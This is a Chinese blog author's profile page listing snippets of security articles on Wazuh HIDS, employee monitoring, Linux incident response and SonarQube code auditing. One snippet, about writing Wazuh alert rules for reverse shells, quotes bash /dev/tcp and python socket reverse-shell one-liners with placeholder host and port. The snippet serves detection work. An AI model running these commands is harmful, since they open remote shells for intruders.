加入MT刚好3个月整,来记录一些自己的发现和感悟。 入职第一周-如何快速进入工作状态 和所有新人一样,公司的新人培训计划提供了很多了解公司以及如何开展工作的课程,但是因为新人...
发简信
IP属地:天津
-
安全工程师如何快速适应新企业及一些新员工感悟
-
Wauzh原理简析及audit规则风险评估
HIDS基本原理 熟悉HIDS的朋友应该了解,服务器的shell监控一般有两种,一种依靠Linux的audit审计功能,比如Wazuh,一种是重编译和替换bash二进制文件,...
-
企业安全-浅谈员工行为监控
我目前就职于一家私企的安全部,主要做安全审计的工作,很多公司的离职流程没有考虑过员工的异常行为审计,18年我在逛微博的时候看到google的一条新闻,审计人员发现一名员工在离...
-
Wauzh自定义反弹shell告警规则常见反弹: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subprocess;s=socket.so...
-
Wazuh配置使用腾讯企业邮箱告警
测试环境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1、wazuh服务器上安装postfii及相关服务 yum install ...
-
开源HIDS-Wauzh功能测试一、Wazuh 守护进程及工具进程 守护进程 ossec-agentd https://documentation.wazuh.com/3.10/user-manual/re...
-
开源HIDS-Wauzh测试使用
Wazuh简介 前端时间调研了一些HIDS的开源系统: https://github.com/Neo23x0/Fenrir更加方便(不需要安装代理或者软件包)使用的IOC扫描...
-
应急响应-Linux应急排查手册
账号排查 grep :0: /etc/passwd #检查是否产生了新用户,和UID、GID为0的用户 stat /etc/passwd #检查文件修改记录 awk -F: ...
-
git blame使用
命令名称: git-blame - 显示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l] [--root] [-t]...
-
安全系统建设-SonarQube实现GitLab代码审计最近领导让我调研一下代码审计的开源工具,发现sonarqube这个系统能够满足我们的需求,可以与gitlab联动进行代码审计。 一、代码审计需求及方案 满足gitlab一旦提...
-
一步步编写SonarQube Plugin插件不好写?! 插件确实不好写,因为插件是插入庞大的系统当中工作的,那也就意味着写插件需要具备一定的领域知识,包括系统架构、扩展点、业务共性及差异、API及其业务模型对应、安...
-
Windows sysmon+winlogbeat+ELK实现Windows监控
一、sysmon告警介绍 sysmon提供21种事件告警: Event ID 1:进程创建 Event ID 2:进程更改文件创建时间 Event ID 3:网络连接 Eve...
-
企业安全-如何在Github上删除敏感数据
一、 前言 在企业安全中,常有安全意识薄弱的员工将企业核心代码上传到了GitHub,可是当上传者无法及时定位又需要快速的删除这些代码时,GitHub提供了两个协议,用于保护被...
-
如果你是程序员,或者有一颗喜欢写程序的心,喜欢分享技术干货、项目经验、程序员日常囧事等等,欢迎投稿《程序员》专题。 专题主编:小彤花园 http://www.jianshu.com/users/4a4eb4feee62/ 【程序员】专题拒稿指北:http://www.jianshu.com/p/7c8b33b5f63b 投稿须知: 1.收录相关技术文章,但不限于技术,也可以是项目经验类的文章和程序员日常。 2.文章內不得有任何推广信息。包括但不限于公众号、微博、微信,更不得在通过投稿后再修改文章加入推广信息。你可以将这些推广以及个人信息放在个人主页介绍里。 3.字数极少,段落混乱,大段代码没有放到代码框的文章不收录 4.不相关的内容不收录,请确认文章内容和本专题相关 目前针对优质作者及爱好者,开设了官方程序员微信群,希望加入请发简信给主编小彤花园索取个人微信,主编会将你加入到【程序员】微信群,分享内容,收获知识。添加微信时备注昵称。
